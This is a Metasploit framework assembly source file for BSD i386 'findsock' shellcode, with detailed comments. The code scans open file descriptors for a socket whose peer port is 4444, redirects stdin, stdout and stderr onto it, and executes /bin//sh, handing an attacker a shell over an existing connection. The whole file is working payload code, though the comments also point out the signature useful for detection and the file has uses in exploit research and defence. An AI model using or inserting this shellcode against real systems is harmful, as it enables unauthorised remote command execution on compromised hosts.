Path: blob/master/external/source/shellcode/bsd/ia32/single_findsock.asm
;
; Name: single_findsock
; Qualities: Nothing Special
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision: 1846 $
; License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        This payload redirects /bin/sh to a socket connected from a
;        certain source port.
;
;;

BITS 32

section .text
global main

;-----------------------------------------------------------------------
; main  (BSD i386 "findsock" stub; no return)
; ABI:   BSD i386 int 0x80 convention: syscall number in eax, arguments
;        on the stack above one dummy dword (the "return address" slot
;        the kernel skips). Every int 0x80 below is preceded by one
;        throw-away push for that slot.
; Regs:  edi = file descriptor currently being probed / the matched fd
;        ebp = base of the sockaddr buffer (a single pushed dword; the
;              16-byte getpeername write runs 12 bytes past it into
;              whatever sits above main's entry esp)
;        ecx = target fd for dup2, counts 2 -> 1 -> 0
;        eax = syscall number / syscall return value
; Notes: - fd probing starts at 1 (inc before the first getpeername),
;          so fd 0 is never examined.
;        - getpeername errors (closed fd, not a socket) are ignored; the
;          loop only ends when the port word in the buffer matches, so
;          it spins indefinitely if no such peer exists.
;        - 0x5c11 is the little-endian image of the network-order port
;          0x115c (4444); this is the "certain source port" of the
;          description and is the value a generator would patch.
;        - The 0x1f / 0x5a / 0x3b syscall numbers are FreeBSD i386
;          getpeername / dup2 / execve — together with the dup2 0..2
;          fan-out and "/bin//sh" they form the recognisable findsock
;          signature for anyone writing a detection.
;-----------------------------------------------------------------------
main:
        xor     edi, edi                ; edi = 0; probing counter (first probe is fd 1)
        push    edi                     ; one zero dword: start of the sockaddr buffer
        mov     ebp, esp                ; ebp = &buffer, fixed for the loop

getpeername_loop:
        ; 32-bit is okay since the connection should be established already.
        inc     edi                     ; next fd to probe

        mov     esp, ebp                ; discard the previous iteration's arguments
        push    byte 0x10               ; namelen = sizeof(struct sockaddr_in) = 16
        push    esp                     ; &namelen (esp now points at the 0x10 dword)
        push    ebp                     ; name = buffer at ebp
        push    edi                     ; s = fd under test
        push    byte 0x1f
        pop     eax                     ; eax = SYS_getpeername (31)
        push    byte 0x02               ; dummy return-address slot (value irrelevant)
        int     0x80                    ; getpeername(edi, ebp, &namelen)

        ; sockaddr_in: sin_len(1) sin_family(1) sin_port(2) ... ->
        ; [ebp + 2] is sin_port in network byte order; compare against
        ; the expected peer port image.
        cmp     word [ebp + 2], 0x5c11
        jne     getpeername_loop        ; not our socket (or the call failed): try the next fd

        pop     ecx                     ; ecx = 0x02, the dummy pushed above: highest fd to dup2 onto

dup2_loop:
        push    ecx                     ; arg2: newfd (2, then 1, then 0)
        push    edi                     ; arg1: oldfd = the matched socket
        push    byte 0x5a
        pop     eax                     ; eax = SYS_dup2 (90)
        push    ecx                     ; dummy return-address slot
        int     0x80                    ; dup2(edi, ecx)
        dec     ecx
        jns     dup2_loop               ; loop while ecx >= 0; exits with ecx = -1

        push    0x68732f2f              ; "//sh"
        push    0x6e69622f              ; "/bin"   -> esp = "/bin//sh\0" (NUL from the pushed
                                        ;             dummy dword that follows on the stack)

        mov     ebx, esp                ; ebx = path

        push    eax                     ; envp = NULL: relies on the last dup2 (onto fd 0)
                                        ; having returned 0 in eax
        push    esp                     ; argv = pointer to that NULL (empty argv)
        push    ebx                     ; path

        mov     al, 0x3b                ; eax = SYS_execve (59); upper bytes are 0 from the dup2 return
        push    eax                     ; dummy return-address slot
        int     0x80                    ; execve(path, argv, envp) - does not return on success